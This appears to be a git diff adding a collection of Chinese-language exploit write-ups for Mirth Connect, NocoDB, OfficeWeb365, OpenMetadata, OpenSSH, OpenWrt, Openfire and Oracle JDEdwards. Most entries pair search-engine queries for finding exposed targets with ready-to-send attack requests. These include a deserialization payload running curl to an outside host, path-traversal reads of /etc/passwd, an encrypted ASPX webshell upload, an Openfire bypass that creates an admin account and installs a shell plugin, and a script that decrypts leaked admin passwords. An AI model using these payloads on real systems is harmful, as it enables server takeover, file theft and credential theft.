@@ -0,0 +1,78 @@ +# NextGen Mirth Connect XStream存在反序列化远程代码执行漏洞 + +# 一、漏洞简介 +NextGen Mirth Connect XStream反序列化远程代码执行漏洞(CVE-2023-43208),未经身份验证的远程攻击者可利用此漏洞写入后门文件,执行任意命令,导致服务器被控。 + +# 二、影响版本 ++ `title="Mirth Connect Administrator"` ++ 特征 + +![1729961516962-8e84d6cc-c576-4699-a794-37e8bd889d3f.png](./img/Ahlw4YbNSt6U5uWR/1729961516962-8e84d6cc-c576-4699-a794-37e8bd889d3f-547025.png) + +# 三、漏洞复现 +```plain +POST /api/users HTTP/1.1 +Host: +X-Requested-With: OpenAPI +Content-Type: application/xml + +<sorted-set> + <string>abcd</string> + <dynamic-proxy> + <interface>java.lang.Comparable</interface> + <handler class="org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler"> + <target class="org.apache.commons.collections4.functors.ChainedTransformer"> + <iTransformers> + <org.apache.commons.collections4.functors.ConstantTransformer> + <iConstant class="java-class">java.lang.Runtime</iConstant> + </org.apache.commons.collections4.functors.ConstantTransformer> + <org.apache.commons.collections4.functors.InvokerTransformer> + <iMethodName>getMethod</iMethodName> + <iParamTypes> + <java-class>java.lang.String</java-class> + <java-class>[Ljava.lang.Class;</java-class> + </iParamTypes> + <iArgs> + <string>getRuntime</string> + <java-class-array/> + </iArgs> + </org.apache.commons.collections4.functors.InvokerTransformer> + <org.apache.commons.collections4.functors.InvokerTransformer> + <iMethodName>invoke</iMethodName> + <iParamTypes> + <java-class>java.lang.Object</java-class> + <java-class>[Ljava.lang.Object;</java-class> + </iParamTypes> + <iArgs> + <null/> + <object-array/> + </iArgs> + </org.apache.commons.collections4.functors.InvokerTransformer> + <org.apache.commons.collections4.functors.InvokerTransformer> + <iMethodName>exec</iMethodName> + <iParamTypes> + <java-class>java.lang.String</java-class> + </iParamTypes> + <iArgs> + <string>curl http://jveuewgzdi.iyhc.eu.org</string> + </iArgs> + </org.apache.commons.collections4.functors.InvokerTransformer> + 
</iTransformers> + </target> + <methodName>transform</methodName> + <eventTypes> + <string>compareTo</string> + </eventTypes> + </handler> + </dynamic-proxy> +</sorted-set> +``` + + + +![1729961537056-5c897bff-09cb-489d-bb3e-72cb9f1812f0.png](./img/Ahlw4YbNSt6U5uWR/1729961537056-5c897bff-09cb-489d-bb3e-72cb9f1812f0-384661.png) + + + +> 更新: 2024-11-27 10:01:46 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lgpb79rrbo0w37b0> \ No newline at end of file diff --git a/NocoDB任意文件读取漏洞(CVE-2023-35843).md b/NocoDB任意文件读取漏洞(CVE-2023-35843).md new file mode 100644 index 0000000..c86a995 --- /dev/null +++ b/NocoDB任意文件读取漏洞(CVE-2023-35843).md @@ -0,0 +1,32 @@ +# NocoDB任意文件读取漏洞(CVE-2023-35843) + +# 一、漏洞简介 +NocoDB是一个开源 Airtable 替代品。将任何 MySql、PostgreSql、Sql Server、Sqlite 和 MariaDb 转换为智能电子表格。NocoDB存在任意文件读取漏洞。 + +# 二、影响版本 ++ NocoDB + +# 三、资产测绘 ++ hunter`web.icon=="5d7c3d89c1d24cb4f15a508f7f0b6daf"&&web.title="NocoDB"` ++ 登录页面 + +![1693921077108-552cf2d5-970a-4f6e-bbcd-bf48e2538189.png](./img/9vDPKBC4oRNWg3jb/1693921077108-552cf2d5-970a-4f6e-bbcd-bf48e2538189-144298.png) + +# 四、漏洞复现 +```plain +GET /download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +``` + +![1693921148029-64aff3bb-16ff-4f8d-a963-b219bd5f9790.png](./img/9vDPKBC4oRNWg3jb/1693921148029-64aff3bb-16ff-4f8d-a963-b219bd5f9790-721038.png) + + + +> 更新: 2024-02-29 23:57:33 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fvdfqew9f4ggosya> \ No newline at end of file diff --git a/OfficeWeb365-文件上传漏洞.md b/OfficeWeb365-文件上传漏洞.md new file mode 100644 index 0000000..5c290c8 --- /dev/null +++ b/OfficeWeb365-文件上传漏洞.md 
@@ -0,0 +1,80 @@ +## OfficeWeb365 文件上传漏洞 +【消息详情】:360漏洞云监测到网传《OfficeWeb365 远程代码执行漏洞》的消息,经漏洞云复核,确认为【真实】漏洞,漏洞影响【未知】版本,该漏洞标准化POC已经上传漏洞云情报平台,平台编号:360LDYLD-2023-00002453,情报订阅用户可登录漏洞云情报平台( https://loudongyun.360.cn/bug/list )查看漏洞详情。 +360漏洞云监测到网传《OfficeWeb365远程代码执行漏洞》的消息,经漏洞云复核,确认为【真实】漏洞,漏洞影响【未知】版本,该漏洞标准化POC已经升级漏洞云情报平台,平台编号: 360LDYLD-2023-0000245 +``` +POST /PW/SaveDraw?path=../../Content/img&idx=1.aspx HTTP/1.1 +Host: +Content-Length: 500817 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12A366 Safari/600.1.4 +Accept-Encoding: gzip, deflate + +data:image/png;base64,01s34567890123456789y12345678901234567m91<% @ Page Language="C #"%> + +<% @ Import namespace="System. Reflection"%> + +<Script Run="Server"> + +Private byte decryption (byte data) + +{ + +String key="e45e329feb5d925b"; + +Data=Convert. FromBase64String (System. Text. Encoding. UTF8. GetString (data)); + +System. Security. Cryptography. RijndaelManaged aes=new System. Security. Cryptography. RijndaelManaged(); + +Aes. Mode=System. Security. Cryptography. CipherMode. ECB; + +Aes. Key=Encoding. UTF8. GetBytes (key); + +Aes. Padding=System. Security. Cryptography. PaddingMode. PKCS7; + +Return aes. CreateDecryptor(). TransformFinalBlock (data, 0, data. Length); + +} + +Private Byte Encryption (Byte Data) + +{ + +String key="e45e329feb5d925b"; + +System. Security. Cryptography. RijndaelManaged aes=new System. Security. Cryptography. RijndaelManaged(); + +Aes. Mode=System. Security. Cryptography. CipherMode. ECB; + +Aes. Key=Encoding. UTF8. GetBytes (key); + +Aes. Padding=System. Security. Cryptography. PaddingMode. PKCS7; + +Return System. Text. Encoding. UTF8. GetBytes (Convert. ToBase64String (aes. CreateEncryptor(). TransformFinalBlock (data, 0, data. Length))); + +} + +</Script> + +<% + +//Byte [] c=Request. BinaryRead (Request. ContentLength); Assembly. Load (Decrypt (c)). 
CreateInstance ("U"). Equals (this); + +Byte [] c=Request. BinaryRead (Request. ContentLength); + +String asname=System. Text. Encoding. ASCII. GetString (new byte [] {0x53, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x2e, 0x52, 0x65, 0x66, 0x6c, 0x65, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0x2e, 0x41, 0x73, 0x73, 0x65, 0x6d, 0x62, 0x6c, 0x79}); + +Type Assembly=Type. GetType (asname); + +MethodInfo load=assembly. GetMethod ("Load", new Type [] {new byte [0]. GetType()}); + +Object obj=load. Invoke (null, new object [] {Decrypt (c)}); + +MethodInfo create=assembly. GetMethod ("CreateInstance", new Type [] {"". GetType()}); + +String name=System. Text. Encoding. ASCII. GetString (new byte [] {0x55}); + +Object pay=create. Invoke (obj, new object [] {name}); + +Pay. Equals (this);%>>--- + +``` diff --git a/OfficeWeb365Pic存在任意读取漏洞.md b/OfficeWeb365Pic存在任意读取漏洞.md new file mode 100644 index 0000000..b029343 --- /dev/null +++ b/OfficeWeb365Pic存在任意读取漏洞.md 
@@ -0,0 +1,39 @@ +# OfficeWeb365 Pic存在任意读取漏洞 + +# 一、漏洞简介 +OfficeWeb365是西安大西信息科技有限公司开发的,专注于Office文档在线预览及PDF文档在线预览云服务,包括Microsoft Word文档在线预览、Excel表格在线预览、Powerpoint演示文档在线预览,WPS文字处理、WPS表格、WPS演示及Adobe PDF文档在线预览。广泛应用于OA办公系统、招聘网站、在线教育类网站,提高客户体验、增加产品竞争力。OfficeWeb365 /Pic/Indexs接口处存在任意文件读取漏洞,攻击者可通过独特的加密方式对payload进行加密,读取任意文件,获取服务器敏感信息,使系统处于极不安全的状态。 + +# 二、影响版本 ++ OfficeWeb365 + +# 三、资产测绘 ++ hunter:`app.name="OfficeWeb365"` + +![1692028029052-65569f24-4578-4a92-a007-d93c1b5b8f94.png](./img/Lvi5zs9BqmYWw8we/1692028029052-65569f24-4578-4a92-a007-d93c1b5b8f94-620163.png) + ++ 登录页面 + +![1692028081742-18ce6201-05b3-4e01-a21c-4eca8dcf2636.png](./img/Lvi5zs9BqmYWw8we/1692028081742-18ce6201-05b3-4e01-a21c-4eca8dcf2636-180691.png) + +# 四、漏洞复现 +```http +GET /Pic/Indexs?imgs=DJwkiEm6KXJZ7aEiGyN4Cz83Kn1PLaKA09 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +``` + +![1705158317873-5dd3158a-9b82-425f-a3a3-6d588f57aff0.png](./img/Lvi5zs9BqmYWw8we/1705158317873-5dd3158a-9b82-425f-a3a3-6d588f57aff0-908828.png) + +[Mosaic-crypt-tools-1.5-SNAPSHOT-jar-with-dependencies.jar](https://www.yuque.com/attachments/yuque/0/2024/jar/1622799/1709222151369-ef2358bd-08df-4e87-92ee-c1b130128665.jar) + +![1705158348583-85083a94-d61a-47a6-9280-2453025e7da7.png](./img/Lvi5zs9BqmYWw8we/1705158348583-85083a94-d61a-47a6-9280-2453025e7da7-397744.png) + + + +> 更新: 2024-02-29 23:55:51 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ot9mxhmqtud1katb> \ No newline at end of file diff --git a/OfficeWeb365SaveDraw存在任意文件上传漏洞.md b/OfficeWeb365SaveDraw存在任意文件上传漏洞.md new file mode 100644 index 0000000..89ea554 --- /dev/null +++ b/OfficeWeb365SaveDraw存在任意文件上传漏洞.md 
@@ -0,0 +1,58 @@ +# OfficeWeb365 SaveDraw存在任意文件上传漏洞 + +# 一、漏洞简介 +OfficeWeb365是西安大西信息科技有限公司开发的,专注于Office文档在线预览及PDF文档在线预览云服务,包括Microsoft Word文档在线预览、Excel表格在线预览、Powerpoint演示文档在线预览,WPS文字处理、WPS表格、WPS演示及Adobe PDF文档在线预览。广泛应用于OA办公系统、招聘网站、在线教育类网站,提高客户体验、增加产品竞争力。OfficeWeb365 /PW/SaveDraw存在任意文件上传漏洞。 + +# 二、影响版本 ++ OfficeWeb365 + +# 三、资产测绘 ++ hunter:`app.name="OfficeWeb365"` + +![1692028029052-65569f24-4578-4a92-a007-d93c1b5b8f94.png](./img/SE9ISR0qOEH1QGWX/1692028029052-65569f24-4578-4a92-a007-d93c1b5b8f94-882686.png) + ++ 登录页面 + +![1692028081742-18ce6201-05b3-4e01-a21c-4eca8dcf2636.png](./img/SE9ISR0qOEH1QGWX/1692028081742-18ce6201-05b3-4e01-a21c-4eca8dcf2636-273911.png) + +# 四、漏洞复现 +```plain +POST /PW/SaveDraw?path=../../Content/img&idx=11.ashx HTTP/1.1 +Host: xx.xx.xx +User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 +Content-Type: application/x-www-form-urlencoded + +data:image/png;base64,<%@ Language="C#" Class="Handler1" %>public class Handler1:System.Web.IHttpHandler +{ +public void ProcessRequest(System.Web.HttpContext context) +{ +System.Web.HttpResponse response = context.Response; +response.Write(44 * 41); + +string filePath = context.Server.MapPath("/") + context.Request.Path; +if (System.IO.File.Exists(filePath)) +{ + System.IO.File.Delete(filePath); +} +} +public bool IsReusable +{ +get { return false; } +} +}///--- +``` + +![1701180007393-aa52d3f6-1378-4a67-be24-c41634aa5bbd.png](./img/SE9ISR0qOEH1QGWX/1701180007393-aa52d3f6-1378-4a67-be24-c41634aa5bbd-536589.png) + +上传文件位置 + +```plain +/Content/img/UserDraw/drawPW11.ashx +``` + +![1701180072351-7554664d-c81e-48a1-b618-1218a79a505e.png](./img/SE9ISR0qOEH1QGWX/1701180072351-7554664d-c81e-48a1-b618-1218a79a505e-918752.png) + + + +> 更新: 2024-02-29 23:55:51 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ws6vxp637qoycw2u> \ No newline at end of file 
diff --git a/OfficeWeb365wordfix存在任意读取漏洞.md b/OfficeWeb365wordfix存在任意读取漏洞.md new file mode 100644 index 0000000..05f3131 --- /dev/null +++ b/OfficeWeb365wordfix存在任意读取漏洞.md @@ -0,0 +1,35 @@ +# OfficeWeb365 wordfix存在任意读取漏洞 + +# 一、漏洞简介 +OfficeWeb365是西安大西信息科技有限公司开发的,专注于Office文档在线预览及PDF文档在线预览云服务,包括Microsoft Word文档在线预览、Excel表格在线预览、Powerpoint演示文档在线预览,WPS文字处理、WPS表格、WPS演示及Adobe PDF文档在线预览。广泛应用于OA办公系统、招聘网站、在线教育类网站,提高客户体验、增加产品竞争力。OfficeWeb365 /wordfix/Indexs接口处存在任意文件读取漏洞,攻击者可通过独特的加密方式对payload进行加密,读取任意文件,获取服务器敏感信息,使系统处于极不安全的状态。 + +# 二、影响版本 ++ OfficeWeb365 + +# 三、资产测绘 ++ hunter:`app.name="OfficeWeb365"` + +![1692028029052-65569f24-4578-4a92-a007-d93c1b5b8f94.png](./img/1uGoArCQ7SLdakCW/1692028029052-65569f24-4578-4a92-a007-d93c1b5b8f94-682048.png) + ++ 登录页面 + +![1692028081742-18ce6201-05b3-4e01-a21c-4eca8dcf2636.png](./img/1uGoArCQ7SLdakCW/1692028081742-18ce6201-05b3-4e01-a21c-4eca8dcf2636-126524.png) + +# 四、漏洞复现 +```plain +GET /wordfix/Index?f=YzovV2luZG93cy93aW4uaW5p HTTP/2 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Connection: close +Upgrade-Insecure-Requests: 1 +``` + +![1705936378459-10dffce2-93e7-4f55-aba9-2cef52979109.png](./img/1uGoArCQ7SLdakCW/1705936378459-10dffce2-93e7-4f55-aba9-2cef52979109-574409.png) + + + +> 更新: 2024-02-29 23:55:51 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/aywxwlh86qyygfg7> \ No newline at end of file diff --git a/OpenMetadataCVE-2024-28255命令执行漏洞.md b/OpenMetadataCVE-2024-28255命令执行漏洞.md new file mode 100644 index 0000000..ffe589c --- /dev/null +++ b/OpenMetadataCVE-2024-28255命令执行漏洞.md 
@@ -0,0 +1,32 @@ +# OpenMetadata CVE-2024-28255 命令执行漏洞 + +# 一、漏洞简介 +OpenMetadata是一个用于数据治理的一体化平台,可以帮助我们发现,协作,并正确的获取数据。其提供了数据发现、数据血缘、数据质量、数据探查、数据治理和团队协作的一体化平台。它是发展最快的开源项目之一,拥有充满活力的社区,并被各行业垂直领域的众多公司采用。 OpenMetadata 由基于开放元数据标准和API 的集中式元数据存储提供支持,支持各种数据服务的连接器,可实现端到端元数据管理,让您可以自由地释放数据资产的价值。其condition接口存在CVE-2024-28255远程命令执行漏洞,可被攻击者接管服务器。 + +# 二、影响版本 ++ OpenMetadata + +# 三、资产测绘 ++ fofa`icon_hash="733091897"` ++ 特征 + +![1714216467929-a292c9d9-b9e2-44ff-9e43-9b167be9754a.png](./img/sj9XAYKGaL4hMSo3/1714216467929-a292c9d9-b9e2-44ff-9e43-9b167be9754a-611877.png) + +# 四、漏洞复现 +执行的命令需base64编码 + +```plain +GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22cGluZyB3YnJ6ZmtxamN5LmRncmgzLmNu%22))) HTTP/1.1 +Host: +User-Agent: Mozilla/2.0 (compatible; MSIE 3.01; Windows 95 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Upgrade-Insecure-Requests: 1 +Connection: close +``` + +![1714216506355-e0737ddc-db9a-46fd-a0e8-7de860167cb0.png](./img/sj9XAYKGaL4hMSo3/1714216506355-e0737ddc-db9a-46fd-a0e8-7de860167cb0-461663.png) + + + +> 更新: 2024-04-28 16:11:56 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pz2p78tho923aukc> \ No newline at end of file diff --git a/OpenSSH-ProxyCommand命令注入漏洞-(CVE-2023-51385).md b/OpenSSH-ProxyCommand命令注入漏洞-(CVE-2023-51385).md new file mode 100644 index 0000000..6367b27 --- /dev/null +++ b/OpenSSH-ProxyCommand命令注入漏洞-(CVE-2023-51385).md 
@@ -0,0 +1,23 @@ +## OpenSSH ProxyCommand命令注入漏洞 (CVE-2023-51385) +SSHProxyCommand是一个用于代理SSH连接的广泛使用的功能,允许用户指定用于连接到服务器的自定义命令。该功能的参数中可能包含像%h(主机名)和%u(用户名)这样的标记。然而,当主机名来自不受信任的来源时,存在潜在的安全风险,因为可能构造恶意主机名,看起来像“恶意命令”,并通过反引号执行Shell命令。 + +首先需要在~/.ssh/config增加如下 +``` +host *.example.com + ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p +``` +.gitmodules文件语句中存在命令注入 +``` +url = ssh://`echo helloworld > cve.txt`foo.example.com/bar +``` +配置完成后,执行下面的指令触发 +``` +git clone https://github.com/wy876/CVE-2023-51385_test --recurse-submodules +``` +如果成功执行将会在CVE-2023-51385_test目录下生成cve.txt文件 + +![image](https://github.com/wy876/POC/assets/139549762/ab5f8d1a-2cd0-48af-8828-28447f809ad5) + + +## 漏洞来源 +- https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html diff --git a/OpenWrt任意文件读取.md b/OpenWrt任意文件读取.md new file mode 100644 index 0000000..bc9aa64 --- /dev/null +++ b/OpenWrt任意文件读取.md 
@@ -0,0 +1,45 @@ +# OpenWrt任意文件读取 + +## poc + +```javascript +POST /cgi-bin/luci/admin/ubus?1733734260589 HTTP/1.1 +Host: 192.168.121.180 +Content-Length: 121 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36 +Content-Type: application/json +Accept: */* +Origin: http://192.168.121.180 +Referer: http://192.168.121.180/cgi-bin/luci/ +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: sysauth=305ade5ef36d6ced39e386729e8868b6 +Connection: close + +[{"jsonrpc":"2.0","id":0,"method":"call","params":["305ade5ef36d6ced39e386729e8868b6","file","list",{"path":"/www/"}]}] +``` + +```javascript +POST /cgi-bin/luci/admin/ubus?1733734260589 HTTP/1.1 +Host: 192.168.121.180 +Content-Length: 127 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36 +Content-Type: application/json +Accept: */* +Origin: http://192.168.121.180 +Referer: http://192.168.121.180/cgi-bin/luci/ +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: sysauth=305ade5ef36d6ced39e386729e8868b6 +Connection: close + +[{"jsonrpc":"2.0","id":0,"method":"call","params":["305ade5ef36d6ced39e386729e8868b6","file","read",{"path":"/etc/passwd"}]}] +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112142249.webp) + + + +## 漏洞来源 + +- https://mp.weixin.qq.com/s/nRSmiZy5JMt-0K1sSeUexw \ No newline at end of file diff --git a/Openfire身份认证绕过漏洞&getshell(CVE-2023-32315).md b/Openfire身份认证绕过漏洞&getshell(CVE-2023-32315).md new file mode 100644 index 0000000..49b1267 --- /dev/null +++ b/Openfire身份认证绕过漏洞&getshell(CVE-2023-32315).md 
@@ -0,0 +1,82 @@ +# Openfire身份认证绕过漏洞&getshell(CVE-2023-32315) + +# 一、漏洞简介 + Openfire是免费的、开源的、基于可拓展通讯和表示协议(XMPP)、采用Java编程语言开发的实时协作服务器。Openfire安装和使用都非常简单,并利用Web进行管理。单台服务器甚至可支持上万并发用户。Openfire的管理控制台是一个基于 Web 的应用程序,被发现可以使用路径遍历的方式绕过权限校验。成功利用后,未经身份验证的用户可以访问 Openfire 管理控制台中的后台页面。同时由于Openfire管理控制台的后台提供了安装插件的功能,所以攻击者可以通过安装恶意插件达成远程代码执行的效果。 + +# 二、影响版本 ++ 3.10.0 <= Openfire < 4.6.8 ++ 4.7.0 <= Openfire 4.7.x < 4.7.5 + +# 三、资产测绘 ++ hunter`app.name="Openfire"`![1692201143517-80f3a4d3-bec2-4829-876a-090c26f9d7e0.png](./img/TunDJjI7qkurQ1y9/1692201143517-80f3a4d3-bec2-4829-876a-090c26f9d7e0-665458.png) ++ 登录页面 + +![1692201198433-2be7c1b6-5b9c-4f5f-9797-91444ec564ad.png](./img/TunDJjI7qkurQ1y9/1692201198433-2be7c1b6-5b9c-4f5f-9797-91444ec564ad-037854.png) + +# 四、漏洞复现 +## POC +当访问poc出现如下情况表示存在漏洞 + +```plain +/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp +``` + +![1692201286860-3786d6ee-869c-4059-b250-141dd492092e.png](./img/TunDJjI7qkurQ1y9/1692201286860-3786d6ee-869c-4059-b250-141dd492092e-360287.png) + +EXP + +1. 获取`JSESSIONID`和`csrftoken` + +```plain +GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +``` + +![1692201403607-088e873f-8b9d-4e95-bbdc-22591b30bb7c.png](./img/TunDJjI7qkurQ1y9/1692201403607-088e873f-8b9d-4e95-bbdc-22591b30bb7c-863460.png) + +3. 
通过上一步回去到的`JSESSIONID`和`csrftoken`替换下列数据包中相应参数,构造用户 + +```plain +GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=qvq9l8fyflxMuwP&username=test123&name=&email=&password=test123&passwordConfirm=test123&isadmin=on&create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7 HTTP/1.1 +Host: xx.xx.xx.xx +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: JSESSIONID=node0m00xukgw3om052y56u7ppl451582.node0; csrf=qvq9l8fyflxMuwP +Upgrade-Insecure-Requests: 1 +``` + +![1692201513050-a62bdc73-e575-464c-80f8-76e6d088d6be.png](./img/TunDJjI7qkurQ1y9/1692201513050-a62bdc73-e575-464c-80f8-76e6d088d6be-661254.png) + +4. 使用创建的账户`test123/test123`,登录 + +![1692201674481-2f2c2a1d-6249-439e-a4c0-7092b17aa047.png](./img/TunDJjI7qkurQ1y9/1692201674481-2f2c2a1d-6249-439e-a4c0-7092b17aa047-414561.png) + +5. 在插件处上传利用插件getsgell + +插件下载地址:[https://download.csdn.net/download/qq_33331244/88224220](https://download.csdn.net/download/qq_33331244/88224220) + +![1692202063603-a440bf6b-8bbb-4e44-b742-732bd84bb9e7.png](./img/TunDJjI7qkurQ1y9/1692202063603-a440bf6b-8bbb-4e44-b742-732bd84bb9e7-926645.png) + +6. 插件上传成功 + +![1692202109870-8ee54e40-3ef4-459f-81d5-3f5570cbedba.png](./img/TunDJjI7qkurQ1y9/1692202109870-8ee54e40-3ef4-459f-81d5-3f5570cbedba-838296.png) + +7. 进入服务器->服务器设置->shellplugin,输入密码123,即可实现rce + +![1692202180669-e5ebf2c2-650b-4000-b631-60a70bc1ef45.png](./img/TunDJjI7qkurQ1y9/1692202180669-e5ebf2c2-650b-4000-b631-60a70bc1ef45-199143.png) + +![1692202195272-898e77a1-37c4-43cd-97f1-5c3be719f144.png](./img/TunDJjI7qkurQ1y9/1692202195272-898e77a1-37c4-43cd-97f1-5c3be719f144-956700.png) + + + +> 更新: 2024-02-29 23:57:33 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xq7trzegk6ecseyg> \ No newline at end of file 
diff --git a/Oracle-JDEdwards-EnterpriseOne未授权获取管理员密码泄漏.md b/Oracle-JDEdwards-EnterpriseOne未授权获取管理员密码泄漏.md new file mode 100644 index 0000000..21ebc47 --- /dev/null +++ b/Oracle-JDEdwards-EnterpriseOne未授权获取管理员密码泄漏.md 
@@ -0,0 +1,122 @@ +# Oracle-JDEdwards-EnterpriseOne未授权获取管理员密码泄漏 + +Oracle JDEdwards EnterpriseOne Tools未授权获取管理员密码泄漏 + +## shodan + +```yaml +port:8999 product:"Oracle WebLogic Server" +``` + +## poc + +```java +http://ip:8999/manage/fileDownloader?sec=1 +``` + +![image-20240822225543738](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408222255786.png) + +```python +import base64 +import argparse +import subprocess +from Crypto.Cipher import AES +from Crypto.Util.Padding import unpad + +def main(): + # Display ASCII art + print(""" + ______ ______ ___ ___ ___ ___ ___ ________ ____ + / ___/ | / / __/___|_ |/ _ \|_ |/ _ \____|_ /_ /_ /|_ / + / /__ | |/ / _//___/ __// // / __// // /___/ __/ / //_ <_/_ < + \___/ |___/___/ /____/\___/____/\___/ /____//_/____/____/ + """) + + # Parse command-line arguments + parser = argparse.ArgumentParser(description='Decrypt a given string.') + parser.add_argument('--string', help='The string to be decrypted') + parser.add_argument('--target', help='The target URL to fetch the string from') + args = parser.parse_args() + + if args.target: + # Fetch the response from the target URL + response = fetch_target_string_with_curl(args.target) + if response: + input_str = response + print(f"Fetched string from target: {input_str}") + else: + print("No valid string found in the response.") + return + elif args.string: + input_str = args.string + else: + print("You must provide either --string or --target.") + return + + # Decrypt the string + array_of_bytes = jde_decipher(input_str.encode("UTF-8")) + print("Decrypted string:", array_of_bytes.decode("UTF-8")) + +def fetch_target_string_with_curl(target_url): + try: + # Use curl to fetch the target URL with SSL verification disabled + result = subprocess.run(['curl', '-k', target_url], capture_output=True, text=True) + if result.returncode == 0: + response_text = result.stdout.strip() + print("Response received:") + print(response_text) # Print for debugging + return response_text 
+ else: + print(f"curl failed with return code {result.returncode}") + return None + except Exception as e: + print(f"Failed to fetch from target using curl: {e}") + return None + +def jde_decipher(param_array_of_bytes): + array_of_bytes_1 = show_buffer(param_array_of_bytes) + array_of_bytes_2 = base64.b64decode(array_of_bytes_1) + return array_of_bytes_2 + +def show_buffer(param_array_of_bytes): + array_of_bytes_1 = bytearray(len(param_array_of_bytes) // 2) + for j in range(len(array_of_bytes_1)): + i = 2 * j + array_of_bytes_1[j] = ((param_array_of_bytes[i] - 65) << 4) + (param_array_of_bytes[i + 1] - 65) + + if array_of_bytes_1[0] != 2: + raise Exception("Invalid version for net showBuffer") + + array_of_bytes_2 = bytearray(16) + array_of_bytes_3 = bytearray(16) + gen_keys(array_of_bytes_2, array_of_bytes_3, array_of_bytes_1[3]) + + cipher = AES.new(array_of_bytes_2, AES.MODE_CBC, iv=array_of_bytes_3) + array_of_bytes_4 = unpad(cipher.decrypt(bytes(array_of_bytes_1[6:])), AES.block_size) + + return array_of_bytes_4 + +def gen_keys(param_array_of_bytes_1, param_array_of_bytes_2, param_byte): + array_of_bytes_1 = bytearray([65, 4, 95, 12, 88, 41, 6, 114, 119, 93, 37, 68, 75, 19, 49, 46]) + array_of_bytes_2 = bytearray([107, 34, 26, 94, 68, 41, 119, 48, 3, 88, 28, 97, 5, 127, 77, 54]) + array_of_bytes_3 = bytearray([36, 89, 113, 109, 38, 15, 7, 66, 76, 115, 16, 53, 106, 94, 27, 56]) + + j = param_byte >> 4 + k = param_byte & 0xF + m = array_of_bytes_3[j] + for i in range(16): + param_array_of_bytes_1[i] = array_of_bytes_1[i] ^ m + + m = array_of_bytes_3[k] + for i in range(16): + param_array_of_bytes_2[i] = array_of_bytes_2[i] ^ m + +if __name__ == "__main__": + main() +``` + +``` +python3 poc.py --string ACHCJKFKHCJKKKJJIBBOCDPIHOEJIICHDGHGJEBABEAG +``` + +![image-20240822225618589](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408222256627.png) \ No newline at end of file 
